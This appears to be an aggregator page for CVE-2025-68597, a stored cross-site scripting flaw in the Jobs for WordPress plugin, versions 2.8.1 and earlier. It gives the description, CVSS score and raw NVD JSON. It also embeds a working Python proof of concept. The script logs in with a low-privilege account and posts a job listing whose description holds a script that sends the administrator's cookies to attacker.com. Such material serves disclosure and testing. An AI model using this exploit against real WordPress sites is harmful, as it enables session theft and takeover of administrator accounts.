Security Vulnerability Report
中文
CVE-2025-68597 CVSS 6.5 MEDIUM

CVE-2025-68597

Published: 2025-12-24 13:16:27
Last Modified: 2026-04-27 19:16:35
Source: [email protected]

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlueGlass Interactive AG Jobs for WordPress job-postings allows Stored XSS.This issue affects Jobs for WordPress: from n/a through <= 2.8.1.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Jobs for WordPress Plugin <= 2.8.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-68597 PoC - Stored XSS in WordPress Jobs Plugin # Target: WordPress site with Jobs for WordPress plugin <= 2.8.1 target = "http://target-wordpress-site.com" username = "attacker_account" password = "attacker_password" # XSS payload - steals admin cookies xss_payload = "<script>document.location='https://attacker.com/log?c='+document.cookie</script>" def exploit_stored_xss(): """ This PoC demonstrates the stored XSS vulnerability in Jobs for WordPress plugin. The plugin fails to sanitize job posting fields before storing them in the database. When administrators view job listings, the malicious script executes. """ session = requests.Session() # Step 1: Login to WordPress with low-privilege account login_url = f"{target}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } session.post(login_url, data=login_data) # Step 2: Submit malicious job posting job_submit_url = f"{target}/wp-admin/admin.php?page=job-postings-add" job_data = { 'job_title': 'Senior Developer Position', 'job_description': xss_payload, # Malicious XSS payload 'company_name': '<img src=x onerror=alert(document.domain)>', 'submit_job': 'Publish' } response = session.post(job_submit_url, data=job_data) # Step 3: When admin visits job listing, XSS executes print("[*] Malicious job posting submitted successfully") print(f"[*] XSS Payload: {xss_payload}") print("[*] Wait for admin to view the job listing...") return True if __name__ == "__main__": print("CVE-2025-68597 - WordPress Jobs Plugin Stored XSS") print("Target: Jobs for WordPress Plugin <= 2.8.1") exploit_stored_xss()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68597", "sourceIdentifier": "[email protected]", "published": "2025-12-24T13:16:27.177", "lastModified": "2026-04-27T19:16:35.400", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in BlueGlass Interactive AG Jobs for WordPress job-postings allows Stored XSS.This issue affects Jobs for WordPress: from n/a through <= 2.8.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/job-postings/vulnerability/wordpress-jobs-for-wordpress-plugin-2-7-17-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.